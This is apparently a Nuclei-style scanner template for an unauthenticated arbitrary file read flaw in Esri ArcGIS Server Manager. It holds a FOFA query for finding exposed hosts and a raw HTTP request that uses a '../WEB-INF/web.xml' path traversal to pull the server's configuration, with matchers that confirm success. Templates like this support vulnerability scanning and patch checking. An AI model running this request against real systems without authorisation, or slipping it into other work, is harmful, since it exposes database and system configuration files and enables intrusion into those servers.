http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - ArcGIS Server Manager
            - <web-app
            - </web-app>
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
          Cookie: rsaPublicKey=null; JSESSIONID=BF42DC2A96EE5FF68E99CF905AD0AB14
id: ArcGIS-File-reading
info:
    author: Superhero
    description: |-
        fofa: app="esri-ArcGIS"
        ArcGIS地理信息系统 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: ArcGIS 地理信息系统 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489220&idx=1&sn=e2a2c434a0097ee0fb4fb89b17b1fc15&chksm=c267a3f7f5102ae1c48ec81a7b8ed1afc29056677a37ec17067bb9cdf66bf8730f210fd1878e&token=1526905597&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
        - ArcGIS
